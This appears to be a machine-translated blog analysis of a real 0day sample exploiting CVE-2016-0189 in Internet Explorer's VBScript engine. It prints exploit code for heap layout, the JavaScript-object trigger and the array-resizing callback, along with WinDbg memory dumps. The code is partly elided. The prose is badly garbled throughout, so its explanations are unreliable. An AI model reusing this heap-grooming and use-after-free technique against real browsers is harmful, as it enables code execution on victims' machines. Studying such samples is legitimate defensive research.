Last year at the end of 10, I get a public view is not quite the same as CVE-2016-0189 the use of samples. Preliminary analysis, I think this should be the year CVE-2016-0189 of the original Attack File. Its confused approach and subsequent occurrence of CVE-2017-0149, CVE-2018-8174, CVE-2018-8373 exactly the same. Its use and loading shellcode techniques are also behind several utilizing the same.
At the time I at hand with other things, and not to the sample were carefully studied. A few days ago, I re-dug out the relevant samples for a lot of debugging.
This article I will describe the CVE-2016-0189 sample use of the way, the reader later will be seen, the use of the process of dislocation techniques and CVE-2014-6332, CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373 almost the same.
Before the public vision of the CVE-2016-0189 sample, the basic is a reference to this article in the publication of the code, with regard to this disclosure code use of the details, I’m in before articles have detailed analysis.
Below we to a glimpse of 3 years ago CVE-2016-0189 actual 0day samples using the technique.
Memory layout
As of the present in by means of the following code into the function
document. write(" var obj = {}; obj. toString = function() { my_valueof(); return 0;}; StartExploit(obj); " &Unescape(“%3c/script%3e”))
In StartExploit function, first call the prepare function of the memory layout. Each execution of arr2(i) = Null will lead to a tagSAFEARRAY structure of the body memory is recovered.
ReDim arr(0, 0)
arr(0, 0) = 3 'this is an important step, the digital 3 in the dislocation will be interpreted as a vbLong type
…
Sub prepare
Dim arr5()
ReDim arr5(2)
For i = 0 To 17
arr3(i) = arr5
Next
For i = 0 To &h7000
arr1(i) = arr
Next
For i = 0 To 1999
arr2(i) = arr 'will arr2 each member is initialized to an array
Next
For i = 1000 To 100 Step -3
arr2(i)(0, 0) = 0
arr2(i) = Null 'release arr2(100) ~ arr2(1000) between the 1/3 of the elements
Next
ReDim arr4(0, &hFFF) 'defined arr4
End Sub
Function StartExploit(js_obj)
'Omitted unrelated code
prepare
arr4(js_obj, 6) = &h55555555
For i = 0 To 1999
If IsArray(arr2(i)) = True Then
If UBound(arr2(i), 1) > 0 Then
vul_index = i
Exit For
End If
End If
Next
lb_index = LBound(arr2(i), 1)
If prepare_rw_mem() = True Then
Else
Exit Function
End If
addr = leak_addr()
'Omitted in the subsequent code
End Function
Each tagSAFEARRAY in memory occupies a size of 0x30 bytes, wherein after the 0x20 bytes stored tagSAFEARRAY the actual data.
0:015> ! heap-p-a 052a9fb0
address 052a9fb0 found in
_HEAP @ 360000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
052a9f98 0007 0000 [00] 052a9fa0 00030 - (busy)
0:015> dd 052a9fa0 l30/4
052a9fa0 00000000 00000000 00000000 0000000c
052a9fb0 08800002 00000010 00000000 0529d640
052a9fc0 00000001 00000000 00000001 00000000
0:015> dt ole32! tagSAFEARRAY 052a9fb0
+0x000 cDims : 2
+0x002 fFeatures : 0x880
+0x004 cbElements : 0x10
+0x008 cLocks : 0
+0x00c pvData : 0x0529d640
+0x010 rgsabound : [1] tagSAFEARRAYBOUND
The entire release process resulting in approximately 300 0x30 size of the memory hole.
To trigger the vulnerability
Memory layout is completed, the use of the code by arr4(js_obj, 6) = &h55555555 this operation enters the custom my_valueof callback function, and then in the callback function re-definition of arr4 on. This leads to arr4 corresponding to the original pvData memory is released, and according to the required size to apply the new memory.
Sub my_valueof()
ReDim arr4(2, 0)
End Sub
The above statements will result in arr4(2, 0)corresponding to the pvData to apply a size of 0x30 in the memory, with associated memory distribution characteristics, this process will reuse a block just released tagSAFEARRAY memory.
We take a closer look at arr4(js_obj, 6) = &h55555555 statement execution logic.
CVE-2016-0189 causes that AccessArray encountered in javascript objects can lead to a pair of overloaded function callback my_valueof, use the code in my_valueof will arr4 re-defined as arr4(2, 0), when the callback is completed is again returned to the AccessArray, the arr4-related tagSAFEARRAY structure of the body and the pvData pointer have been modified, and the AccessArray will continue to under perform when still in accordance with the arr4(0, 6)in the calculation of element address, and the calculated address is stored to a stack variable.